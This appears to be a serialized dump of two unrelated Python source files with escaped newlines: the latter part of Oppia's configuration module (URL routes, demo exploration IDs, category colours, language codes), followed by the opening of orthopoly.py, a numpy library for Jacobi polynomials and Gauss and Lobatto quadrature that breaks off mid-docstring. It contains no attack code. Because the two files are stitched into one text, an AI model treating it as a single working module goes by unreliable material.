Commits made by this bot\n# are not reflected in the exploration summary models, but are recorded in the\n# exploration commit log.\nMIGRATION_BOT_USER_ID = \'OppiaMigrationBot\'\nMIGRATION_BOT_USERNAME = \'OppiaMigrationBot\'\n\n# Ids and locations of the permitted extensions.\nALLOWED_RTE_EXTENSIONS = {\n \'Collapsible\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Collapsible\')\n },\n \'Image\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Image\')\n },\n \'Link\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Link\')\n },\n \'Math\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Math\')\n },\n \'Tabs\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Tabs\')\n },\n \'Video\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Video\')\n },\n}\n\n# These categories and interactions are displayed in the order in which they\n# appear in the interaction selector.\nALLOWED_INTERACTION_CATEGORIES = [{\n \'name\': \'General\',\n \'interaction_ids\': [\n \'Continue\',\n \'EndExploration\',\n \'ImageClickInput\',\n \'ItemSelectionInput\',\n \'MultipleChoiceInput\',\n \'TextInput\'\n ],\n}, {\n \'name\': \'Math\',\n \'interaction_ids\': [\n \'GraphInput\',\n \'LogicProof\',\n \'NumericInput\',\n \'SetInput\',\n \'MathExpressionInput\',\n ]\n}, {\n \'name\': \'Programming\',\n \'interaction_ids\': [\n \'CodeRepl\',\n \'PencilCodeEditor\',\n ],\n}, {\n \'name\': \'Music\',\n \'interaction_ids\': [\n \'MusicNotesInput\'\n ],\n}, {\n \'name\': \'Geography\',\n \'interaction_ids\': [\n \'InteractiveMap\'\n ],\n}]\n\nALLOWED_GADGETS = {\n \'ScoreBar\': {\n \'dir\': os.path.join(GADGETS_DIR, \'ScoreBar\')\n },\n}\n\n# Gadgets subclasses must specify a valid panel option from this list.\nALLOWED_GADGET_PANELS = [\'bottom\']\n\n# Demo explorations to load through the admin panel. The id assigned to each\n# exploration is based on the key of the exploration in this dict, so ensure it\n# doesn\'t change once it\'s in the list. Only integer-based indices should be\n# used in this list, as it maintains backward compatibility with how demo\n# explorations used to be assigned IDs. The value of each entry in this dict is\n# either a YAML file or a directory (depending on whether it ends in .yaml).\n# These explorations can be found under data/explorations.\nDEMO_EXPLORATIONS = {\n u\'0\': \'welcome.yaml\',\n u\'1\': \'multiples.yaml\',\n u\'2\': \'binary_search\',\n u\'3\': \'root_linear_coefficient_theorem.yaml\',\n u\'4\': \'three_balls\',\n # TODO(bhenning): Replace demo exploration \'5\' with a new exploration\n # described in #1376.\n u\'6\': \'boot_verbs.yaml\',\n u\'7\': \'hola.yaml\',\n u\'8\': \'adventure.yaml\',\n u\'9\': \'pitch_perfect.yaml\',\n u\'10\': \'test_interactions\',\n u\'11\': \'modeling_graphs\',\n u\'12\': \'protractor_test_1.yaml\',\n u\'13\': \'solar_system\',\n u\'14\': \'about_oppia.yaml\',\n u\'15\': \'classifier_demo_exploration.yaml\',\n u\'16\': \'all_interactions\',\n}\n\nDEMO_COLLECTIONS = {\n u\'0\': \'welcome_to_collections.yaml\'\n}\n\n# IDs of explorations which should not be displayable in either the learner or\n# editor views.\nDISABLED_EXPLORATION_IDS = [\'5\']\n\n# Google Group embed URL for the Forum page.\nEMBEDDED_GOOGLE_GROUP_URL = (\n \'https://groups.google.com/forum/embed/?place=forum/oppia\')\n\n# Whether to allow YAML file uploads.\nALLOW_YAML_FILE_UPLOAD = False\n\n# Prefix for all taskqueue-related URLs.\nTASKQUEUE_URL_PREFIX = \'/task\'\nTASK_URL_FEEDBACK_MESSAGE_EMAILS = (\n \'%s/email/batchfeedbackmessageemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_FEEDBACK_STATUS_EMAILS = (\n \'%s/email/feedbackthreadstatuschangeemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_FLAG_EXPLORATION_EMAILS = (\n \'%s/email/flagexplorationemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_INSTANT_FEEDBACK_EMAILS = (\n \'%s/email/instantfeedbackmessageemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_SUGGESTION_EMAILS = (\n \'%s/email/suggestionemailhandler\' % TASKQUEUE_URL_PREFIX)\n\n# TODO(sll): Add all other URLs here.\nADMIN_URL = \'/admin\'\nCOLLECTION_DATA_URL_PREFIX = \'/collection_handler/data\'\nEDITABLE_COLLECTION_DATA_URL_PREFIX = \'/collection_editor_handler/data\'\nCOLLECTION_RIGHTS_PREFIX = \'/collection_editor_handler/rights\'\nCOLLECTION_EDITOR_URL_PREFIX = \'/collection_editor/create\'\nCOLLECTION_URL_PREFIX = \'/collection\'\nDASHBOARD_URL = \'/dashboard\'\nDASHBOARD_CREATE_MODE_URL = \'%s?mode=create\' % DASHBOARD_URL\nDASHBOARD_DATA_URL = \'/dashboardhandler/data\'\nDASHBOARD_EXPLORATION_STATS_PREFIX = \'/dashboardhandler/explorationstats\'\nEDITOR_URL_PREFIX = \'/create\'\nEXPLORATION_DATA_PREFIX = \'/createhandler/data\'\nEXPLORATION_INIT_URL_PREFIX = \'/explorehandler/init\'\nEXPLORATION_METADATA_SEARCH_URL = \'/exploration/metadata_search\'\nEXPLORATION_RIGHTS_PREFIX = \'/createhandler/rights\'\nEXPLORATION_SUMMARIES_DATA_URL = \'/explorationsummarieshandler/data\'\nEXPLORATION_URL_PREFIX = \'/explore\'\nEXPLORATION_URL_EMBED_PREFIX = \'/embed/exploration\'\nFEEDBACK_STATS_URL_PREFIX = \'/feedbackstatshandler\'\nFEEDBACK_THREAD_URL_PREFIX = \'/threadhandler\'\nFEEDBACK_THREADLIST_URL_PREFIX = \'/threadlisthandler\'\nFEEDBACK_THREAD_VIEW_EVENT_URL = \'/feedbackhandler/thread_view_event\'\nFLAG_EXPLORATION_URL_PREFIX = \'/flagexplorationhandler\'\nLIBRARY_GROUP_DATA_URL = \'/librarygrouphandler\'\nLIBRARY_INDEX_URL = \'/library\'\nLIBRARY_INDEX_DATA_URL = \'/libraryindexhandler\'\nLIBRARY_RECENTLY_PUBLISHED_URL = \'/library/recently_published\'\nLIBRARY_SEARCH_URL = \'/search/find\'\nLIBRARY_SEARCH_DATA_URL = \'/searchhandler/data\'\nLIBRARY_TOP_RATED_URL = \'/library/top_rated\'\nNEW_COLLECTION_URL = \'/collection_editor_handler/create_new\'\nNEW_EXPLORATION_URL = \'/contributehandler/create_new\'\nRECENT_COMMITS_DATA_URL = \'/recentcommitshandler/recent_commits\'\nRECENT_FEEDBACK_MESSAGES_DATA_URL = \'/recent_feedback_messages\'\nROBOTS_TXT_URL = \'/robots.txt\'\nSITE_FEEDBACK_FORM_URL = \'\'\nSITE_LANGUAGE_DATA_URL = \'/save_site_language\'\nSIGNUP_DATA_URL = \'/signuphandler/data\'\nSIGNUP_URL = \'/signup\'\nSPLASH_URL = \'/splash\'\nSUGGESTION_ACTION_URL_PREFIX = \'/suggestionactionhandler\'\nSUGGESTION_LIST_URL_PREFIX = \'/suggestionlisthandler\'\nSUGGESTION_URL_PREFIX = \'/suggestionhandler\'\nUPLOAD_EXPLORATION_URL = \'/contributehandler/upload\'\nUSERNAME_CHECK_DATA_URL = \'/usernamehandler/data\'\n\nNAV_MODE_ABOUT = \'about\'\nNAV_MODE_BLOG = \'blog\'\nNAV_MODE_COLLECTION = \'collection\'\nNAV_MODE_CONTACT = \'contact\'\nNAV_MODE_CREATE = \'create\'\nNAV_MODE_DASHBOARD = \'dashboard\'\nNAV_MODE_DONATE = \'donate\'\nNAV_MODE_EXPLORE = \'explore\'\nNAV_MODE_LIBRARY = \'library\'\nNAV_MODE_PROFILE = \'profile\'\nNAV_MODE_SIGNUP = \'signup\'\nNAV_MODE_SPLASH = \'splash\'\nNAV_MODE_TEACH = \'teach\'\nNAV_MODE_THANKS = \'thanks\'\n\n# Event types.\nEVENT_TYPE_STATE_HIT = \'state_hit\'\nEVENT_TYPE_ANSWER_SUBMITTED = \'answer_submitted\'\nEVENT_TYPE_DEFAULT_ANSWER_RESOLVED = \'default_answer_resolved\'\nEVENT_TYPE_NEW_THREAD_CREATED = \'feedback_thread_created\'\nEVENT_TYPE_THREAD_STATUS_CHANGED = \'feedback_thread_status_changed\'\nEVENT_TYPE_RATE_EXPLORATION = \'rate_exploration\'\n# The values for these event types should be left as-is for backwards\n# compatibility.\nEVENT_TYPE_START_EXPLORATION = \'start\'\nEVENT_TYPE_MAYBE_LEAVE_EXPLORATION = \'leave\'\nEVENT_TYPE_COMPLETE_EXPLORATION = \'complete\'\n\nACTIVITY_STATUS_PRIVATE = \'private\'\nACTIVITY_STATUS_PUBLIC = \'public\'\nACTIVITY_STATUS_PUBLICIZED = \'publicized\'\n\n# Play type constants\nPLAY_TYPE_PLAYTEST = \'playtest\'\nPLAY_TYPE_NORMAL = \'normal\'\n\n# Predefined commit messages.\nCOMMIT_MESSAGE_EXPLORATION_DELETED = \'Exploration deleted.\'\nCOMMIT_MESSAGE_COLLECTION_DELETED = \'Collection deleted.\'\n\n# Unfinished features.\nSHOW_TRAINABLE_UNRESOLVED_ANSWERS = False\n# Number of unresolved answers to be displayed in the dashboard for each\n# exploration.\nTOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3\n# Number of open feedback to be displayed in the dashboard for each exploration.\nOPEN_FEEDBACK_COUNT_DASHBOARD = 3\n# NOTE TO DEVELOPERS: This should be synchronized with base.js\nENABLE_STRING_CLASSIFIER = False\nSHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False\nSHOW_COLLECTION_NAVIGATION_TAB_STATS = False\n\n# Output formats of downloaded explorations.\nOUTPUT_FORMAT_JSON = \'json\'\nOUTPUT_FORMAT_ZIP = \'zip\'\n\n# Types of updates shown in the \'recent updates\' table in the dashboard page.\nUPDATE_TYPE_EXPLORATION_COMMIT = \'exploration_commit\'\nUPDATE_TYPE_COLLECTION_COMMIT = \'collection_commit\'\nUPDATE_TYPE_FEEDBACK_MESSAGE = \'feedback_thread\'\n\n# Possible values for user query status.\n# Valid status transitions are: processing --> completed --> archived\n# Or processing --> failed.\nUSER_QUERY_STATUS_PROCESSING = \'processing\'\nUSER_QUERY_STATUS_COMPLETED = \'completed\'\nUSER_QUERY_STATUS_ARCHIVED = \'archived\'\nUSER_QUERY_STATUS_FAILED = \'failed\'\n\n# The time difference between which to consider two login events ""close"". This\n# is taken to be 12 hours.\nPROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60\n\nDEFAULT_COLOR = \'#a33f40\'\nDEFAULT_THUMBNAIL_ICON = \'Lightbulb\'\n\n# List of supported default categories. For now, each category has a specific\n# color associated with it. Each category also has a thumbnail icon whose\n# filename is ""{{CategoryName}}.svg"".\nCATEGORIES_TO_COLORS = {\n \'Mathematics\': \'#cd672b\',\n \'Algebra\': \'#cd672b\',\n \'Arithmetic\': \'#d68453\',\n \'Calculus\': \'#b86330\',\n \'Logic\': \'#d68453\',\n \'Combinatorics\': \'#cf5935\',\n \'Graph Theory\': \'#cf5935\',\n \'Probability\': \'#cf5935\',\n \'Statistics\': \'#cd672b\',\n \'Geometry\': \'#d46949\',\n \'Trigonometry\': \'#d46949\',\n\n \'Algorithms\': \'#d0982a\',\n \'Computing\': \'#bb8b2f\',\n \'Programming\': \'#d9aa53\',\n\n \'Astronomy\': \'#879d6c\',\n \'Biology\': \'#97a766\',\n \'Chemistry\': \'#aab883\',\n \'Engineering\': \'#8b9862\',\n \'Environment\': \'#aba86d\',\n \'Medicine\': \'#97a766\',\n \'Physics\': \'#879d6c\',\n\n \'Architecture\': \'#6e3466\',\n \'Art\': \'#895a83\',\n \'Music\': \'#6a3862\',\n \'Philosophy\': \'#613968\',\n \'Poetry\': \'#7f507f\',\n\n \'English\': \'#193a69\',\n \'Languages\': \'#1b4174\',\n \'Latin\': \'#3d5a89\',\n \'Reading\': \'#193a69\',\n \'Spanish\': \'#405185\',\n \'Gaulish\': \'#1b4174\',\n\n \'Business\': \'#387163\',\n \'Economics\': \'#5d8b7f\',\n \'Geography\': \'#3c6d62\',\n \'Government\': \'#538270\',\n \'History\': \'#3d6b52\',\n \'Law\': \'#538270\',\n\n \'Education\': \'#942e20\',\n \'Puzzles\': \'#a8554a\',\n \'Sport\': \'#893327\',\n \'Welcome\': \'#992a2b\',\n}\n\n# Types of activities that can be created with Oppia.\nACTIVITY_TYPE_EXPLORATION = \'exploration\'\nACTIVITY_TYPE_COLLECTION = \'collection\'\nALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION]\n\n# A sorted list of default categories for which icons and background colours\n# exist.\nALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys())\n\n# These categories are shown in the library navbar.\nSEARCH_DROPDOWN_CATEGORIES = sorted([\n \'Mathematics\',\n \'Statistics\',\n \'Algorithms\',\n \'Programming\',\n \'Biology\',\n \'Chemistry\',\n \'Physics\',\n \'Medicine\',\n \'English\',\n \'Architecture\',\n \'Art\',\n \'Music\',\n \'Reading\',\n \'Business\',\n \'Economics\',\n \'Geography\',\n \'History\',\n])\n\n# The i18n id for the header of the ""Featured Activities"" category in the\n# library index page.\nLIBRARY_CATEGORY_FEATURED_ACTIVITIES = \'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES\'\n# The i18n id for the header of the ""Top Rated Explorations"" category in the\n# library index page.\nLIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = (\n \'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS\')\n# The i18n id for the header of the ""Recently Published"" category in the\n# library index page.\nLIBRARY_CATEGORY_RECENTLY_PUBLISHED = \'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED\'\n\n# The group name that appears at the end of the url for the recently published\n# page.\nLIBRARY_GROUP_RECENTLY_PUBLISHED = \'recently_published\'\n# The group name that appears at the end of the url for the top rated page.\nLIBRARY_GROUP_TOP_RATED = \'top_rated\'\n\n# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have\n# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. For\n# example LIBRARY_PAGE_MODE_GROUP should have the same value as\n# LIBRARY_PAGE_MODES.GROUP.\n# Page mode for the group pages such as top rated and recently published\n# explorations.\nLIBRARY_PAGE_MODE_GROUP = \'group\'\n# Page mode for the main library page.\nLIBRARY_PAGE_MODE_INDEX = \'index\'\n# Page mode for the search results page.\nLIBRARY_PAGE_MODE_SEARCH = \'search\'\n\n# List of supported language codes. Each description has a\n# parenthetical part that may be stripped out to give a shorter\n# description.\nALL_LANGUAGE_CODES = [{\n \'code\': \'en\', \'description\': u\'English\',\n}, {\n \'code\': \'ar\', \'description\': u\'العربية (Arabic)\',\n}, {\n \'code\': \'bg\', \'description\': u\'български (Bulgarian)\',\n}, {\n \'code\': \'ca\', \'description\': u\'català (Catalan)\',\n}, {\n \'code\': \'zh\', \'description\': u\'中文 (Chinese)\',\n}, {\n \'code\': \'hr\', \'description\': u\'hrvatski (Croatian)\',\n}, {\n \'code\': \'cs\', \'description\': u\'čeština (Czech)\',\n}, {\n \'code\': \'da\', \'description\': u\'dansk (Danish)\',\n}, {\n \'code\': \'nl\', \'description\': u\'Nederlands (Dutch)\',\n}, {\n \'code\': \'tl\', \'description\': u\'Filipino (Filipino)\',\n}, {\n \'code\': \'fi\', \'description\': u\'suomi (Finnish)\',\n}, {\n \'code\': \'fr\', \'description\': u\'français (French)\',\n}, {\n \'code\': \'de\', \'description\': u\'Deutsch (German)\',\n}, {\n \'code\': \'el\', \'description\': u\'ελληνικά (Greek)\',\n}, {\n \'code\': \'he\', \'description\': u\'עברית (Hebrew)\',\n}, {\n \'code\': \'hi\', \'description\': u\'हिन्दी (Hindi)\',\n}, {\n \'code\': \'hu\', \'description\': u\'magyar (Hungarian)\',\n}, {\n \'code\': \'id\', \'description\': u\'Bahasa Indonesia (Indonesian)\',\n}, {\n \'code\': \'it\', \'description\': u\'italiano (Italian)\',\n}, {\n \'code\': \'ja\', \'description\': u\'日本語 (Japanese)\',\n}, {\n \'code\': \'ko\', \'description\': u\'한국어 (Korean)\',\n}, {\n \'code\': \'lv\', \'description\': u\'latviešu (Latvian)\',\n}, {\n \'code\': \'lt\', \'description\': u\'lietuvių (Lithuanian)\',\n}, {\n \'code\': \'no\', \'description\': u\'Norsk (Norwegian)\',\n}, {\n \'code\': \'fa\', \'description\': u\'فارسی (Persian)\',\n}, {\n \'code\': \'pl\', \'description\': u\'polski (Polish)\',\n}, {\n \'code\': \'pt\', \'description\': u\'português (Portuguese)\',\n}, {\n \'code\': \'ro\', \'description\': u\'română (Romanian)\',\n}, {\n \'code\': \'ru\', \'description\': u\'русский (Russian)\',\n}, {\n \'code\': \'sr\', \'description\': u\'српски (Serbian)\',\n}, {\n \'code\': \'sk\', \'description\': u\'slovenčina (Slovak)\',\n}, {\n \'code\': \'sl\', \'description\': u\'slovenščina (Slovenian)\',\n}, {\n \'code\': \'es\', \'description\': u\'español (Spanish)\',\n}, {\n \'code\': \'sv\', \'description\': u\'svenska (Swedish)\',\n}, {\n \'code\': \'th\', \'description\': u\'ภาษาไทย (Thai)\',\n}, {\n \'code\': \'tr\', \'description\': u\'Türkçe (Turkish)\',\n}, {\n \'code\': \'uk\', \'description\': u\'українська (Ukrainian)\',\n}, {\n \'code\': \'vi\', \'description\': u\'Tiếng Việt (Vietnamese)\',\n}]\n\n# Defaults for topic similarities\nDEFAULT_TOPIC_SIMILARITY = 0.5\nSAME_TOPIC_SIMILARITY = 1.0\n\n# NOTE TO DEVELOPERS: While adding another language, please ensure that the\n# languages are in alphabetical order.\nSUPPORTED_SITE_LANGUAGES = [{\n \'id\': \'id\',\n \'text\': \'Bahasa Indonesia\'\n}, {\n \'id\': \'en\',\n \'text\': \'English\'\n}, {\n \'id\': \'es\',\n \'text\': \'Español\'\n}, {\n \'id\': \'pt\',\n \'text\': \'Português\'\n}, {\n \'id\': \'pt-br\',\n \'text\': \'Português (Brasil)\'\n}, {\n \'id\': \'vi\',\n \'text\': \'Tiếng Việt\'\n}, {\n \'id\': \'hi\',\n \'text\': \'हिन्दी\'\n}]\nSYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]\nSYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]\n\n# The following are all page descriptions for the meta tag.\nABOUT_PAGE_DESCRIPTION = (\n \'Oppia is an open source learning platform that connects a community of \'\n \'teachers and learners. You can use this site to create 1-1 learning \'\n \'scenarios for others.\')\nBLOG_PAGE_DESCRIPTION = (\n \'Keep up to date with Oppia news and updates via our blog.\')\nCONTACT_PAGE_DESCRIPTION = (\n \'Contact the Oppia team, submit feedback, and learn how to get involved \'\n \'with the Oppia project.\')\nCREATE_PAGE_DESCRIPTION = (\n \'Help others learn new things. Create lessons through explorations and \'\n \'share your knowledge with the community.\')\nDASHBOARD_PAGE_DESCRIPTION = (\n \'Keep track of the lessons you have created, as well as feedback from \'\n \'learners.\')\nDONATE_PAGE_DESCRIPTION = (\n \'Donate to The Oppia Foundation.\')\nFORUM_PAGE_DESCRIPTION = (\n \'Engage with the Oppia community by discussing questions, bugs and \'\n \'explorations in the forum.\')\nLIBRARY_GROUP_PAGE_DESCRIPTION = (\n \'Discover top-rated or recently-published explorations on Oppia. Learn \'\n \'from these explorations or help improve an existing one for the \'\n \'community.\')\nLIBRARY_PAGE_DESCRIPTION = (\n \'Looking to learn something new? Find explorations created by professors, \'\n \'teachers and Oppia users in a subject you\\\'re interested in, and start \'\n \'exploring!\')\nPREFERENCES_PAGE_DESCRIPTION = (\n \'Change your Oppia profile settings and preferences\')\nSEARCH_PAGE_DESCRIPTION = (\n \'Discover a new exploration to learn from, or help improve an existing \'\n \'one for the community.\')\nSIGNUP_PAGE_DESCRIPTION = (\n \'Sign up for Oppia and begin exploring a new subject.\')\nSPLASH_PAGE_DESCRIPTION = (\n \'Oppia is a free site for sharing knowledge via interactive lessons \'\n \'called \\\'explorations\\\'. Learn from user-created explorations, or teach \'\n \'and create your own.\')\nTEACH_PAGE_DESCRIPTION = (\n \'The Oppia library is full of user-created lessons called \\\'explorations\\\'.\'\n \' Read about how to participate in the community and begin creating \'\n \'explorations.\')\nTERMS_PAGE_DESCRIPTION = (\n \'Oppia is a 501(c)(3) registered non-profit open-source e-learning \'\n \'platform. Learn about our terms and conditions for creating and \'\n \'distributing learning material.\')\nTHANKS_PAGE_DESCRIPTION = (\n \'Thank you for donating to The Oppia Foundation.\')\nSITE_NAME = \'Oppia.org\'\n\n# The type of the response returned by a handler when an exception is raised.\nHANDLER_TYPE_HTML = \'html\'\nHANDLER_TYPE_JSON = \'json\'\n', '""""""\n orthopoly.py - A suite of functions for generating orthogonal polynomials\n and quadrature rules.\n\n Copyright (c) 2014 Greg von Winckel\n All rights reserved.\n\n Permission is hereby granted, free of charge, to any person obtaining\n a copy of this software and associated documentation files (the\n ""Software""), to deal in the Software without restriction, including\n without limitation the rights to use, copy, modify, merge, publish,\n distribute, sublicense, and/or sell copies of the Software, and to\n permit persons to whom the Software is furnished to do so, subject to\n the following conditions:\n\n The above copyright notice and this permission notice shall be\n included in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,\n EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n Last updated on Wed Jan 1 14:29:25 MST 2014\n\n Modified by David A. Ham (dummy@email.com), 2016\n""""""\n\nimport numpy as np\nfrom functools import reduce\nfrom math import gamma\n\n\ndef gauss(alpha, beta):\n """"""\n Compute the Gauss nodes and weights from the recursion\n coefficients associated with a set of orthogonal polynomials\n\n Inputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Outputs:\n x - quadrature nodes\n w - quadrature weights\n\n Adapted from the MATLAB code by Walter Gautschi\n http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m\n """"""\n\n from numpy.linalg import eigh\n\n A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha)\n x, V = eigh(A, ""U"")\n\n w = beta[0] * np.real(np.power(V[0, :], 2))\n return x, w\n\n\ndef lobatto(alpha, beta, xl1, xl2):\n """"""\n Compute the Lobatto nodes and weights with the preassigned\n nodea xl1,xl2\n\n Inputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n xl1 - assigned node location\n xl2 - assigned node location\n\n Outputs:\n x - quadrature nodes\n w - quadrature weights\n\n Based on the section 7 of the paper\n ""Some modified matrix eigenvalue problems""\n by Gene Golub, SIAM Review Vol 15, No. 2, April 1973, pp.318--334\n """"""\n from numpy.linalg import solve\n n = len(alpha) - 1\n en = np.zeros(n)\n en[-1] = 1\n A1 = np.vstack((np.sqrt(beta), alpha - xl1))\n J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1)\n A2 = np.vstack((np.sqrt(beta), alpha - xl2))\n J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1)\n g1 = solve(J1, en)\n g2 = solve(J2, en)\n C = np.array(((1, -g1[-1]), (1, -g2[-1])))\n xl = np.array((xl1, xl2))\n ab = solve(C, xl)\n\n alphal = alpha\n alphal[-1] = ab[0]\n betal = beta\n betal[-1] = ab[1]\n x, w = gauss(alphal, betal)\n return x, w\n\n\ndef rec_jacobi(N, a, b):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n\n P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)\n\n for the Jacobi polynomials which are orthogonal on [-1,1]\n with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b]\n\n Inputs:\n N - polynomial order\n a - weight parameter\n b - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi\n http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m\n """"""\n\n nu = (b - a) / float(a + b + 2)\n mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2)\n\n if N == 1:\n alpha = nu\n beta = mu\n else:\n n = np.arange(1.0, N)\n nab = 2 * n + a + b\n alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2))))\n n = n[1:]\n nab = nab[1:]\n B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3))\n B = 4 * (n + a) * (n + b) * n * (n + a + b) / \\\n (nab ** 2 * (nab + 1) * (nab - 1))\n beta = np.hstack((mu, B1, B))\n\n return alpha, beta\n\n\ndef rec_jacobi01(N, a, b):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n for the Jacobi polynomials which are orthogonal on [0,1]\n\n See rec_jacobi for the recursion coefficients on [-1,1]\n\n Inputs:\n N - polynomial order\n a - weight parameter\n b - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m\n\n """"""\n\n if a <= -1 or b <= -1:\n raise ValueError(\'\'\'Jacobi coefficients are defined only\n for alpha,beta > -1\'\'\')\n\n if not isinstance(N, int):\n raise TypeError(\'N must be an integer\')\n\n if N < 1:\n raise ValueError(\'N must be at least 1\')\n\n c, d = rec_jacobi(N, a, b)\n\n alpha = (1 + c) / 2\n beta = d / 4\n beta[0] = d[0] / 2 ** (a + b + 1)\n\n return alpha, beta\n\n\ndef polyval(alpha, beta, x):\n """"""\n Evaluate polynomials on x given the recursion coefficients alpha and beta\n """"""\n\n N = len(alpha)\n m = len(x)\n P = np.zeros((m, N + 1))\n\n P[:, 0] = 1\n P[:, 1] = (x - alpha[0]) * P[:, 0]\n\n for k in range(1, N):\n P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1]\n\n return P\n\n\ndef jacobi(N, a, b, x, NOPT=1):\n """"""\n JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1]\n with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them\n on the given grid up to P_N(x). Setting NOPT=2 returns the\n L2-normalized polynomials\n """"""\n\n m = len(x)\n P = np.zeros((m, N + 1))\n\n apb = a + b\n a1 = a - 1\n b1 = b - 1\n c = apb * (a - b)\n\n P[:, 0] = 1\n\n if N > 0:\n P[:, 1] = 0.5 * (a - b + (apb + 2) * x)\n\n if N > 1:\n for k in range(2, N + 1):\n k2 = 2 * k\n g = k2 + apb\n g1 = g - 1\n g2 = g - 2\n d = 2.0 * (k + a1) * (k + b1) * g\n P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] -\n d * P[:, k - 2]) / (k2 * (k + apb) * g2)\n\n if NOPT == 2:\n k = np.arange(N + 1)\n pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \\\n ((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1)))\n P *= 1 / np.sqrt(pnorm)\n return P\n\n\ndef jacobiD(N, a, b, x, NOPT=1):\n """"""\n JACOBID computes the first derivatives of the normalized Jacobi\n polynomials which are orthogonal on [-1,1] with respect\n to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them\n on the given grid up to P_N(x). Setting NOPT=2 returns\n the derivatives of the L2-normalized polynomials\n """"""\n\n z = np.zeros((len(x), 1))\n if N == 0:\n Px = z\n else:\n\n Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) *\n ((a + b + 2 + np.arange(N)))))\n return Px\n\n\ndef mm_log(N, a):\n """"""\n MM_LOG Modified moments for a logarithmic weight function.\n\n The call mm=MM_LOG(n,a) computes the first n modified moments of the\n logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to\n shifted Legendre polynomials.\n\n REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre\n polynomial integral\' by James L. Blue\'\',\n Math. Comp. 33 (1979), 742-743.\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m\n """"""\n\n if a <= -1:\n raise ValueError(\'Parameter a must be greater than -1\')\n\n prod = lambda z: reduce(lambda x, y: x * y, z, 1)\n\n mm = np.zeros(N)\n\n c = 1\n for n in range(N):\n if isinstance(a, int) and a < n:\n\n p = range(n - a, n + a + 2)\n mm[n] = (-1) ** (n - a) / prod(p)\n mm[n] *= gamma(a + 1) ** 2\n\n else:\n if n == 0:\n mm[0] = 1 / (a + 1) ** 2\n else:\n k = np.arange(1, n + 1)\n s = 1 / (a + 1 + k) - 1 / (a + 1 - k)\n p = (a + 1 - k) / (a + 1 + k)\n mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1)\n\n mm[n] *= c\n c *= 0.5 * (n + 1) / (2 * n + 1)\n\n return mm\n\n\ndef mod_chebyshev(N, mom, alpham, betam):\n """"""\n Calcuate the recursion coefficients for the orthogonal polynomials\n which are are orthogonal with respect to a weight function which is\n represented in terms of its modifed moments which are obtained by\n integrating the monic polynomials against the weight function.\n\n 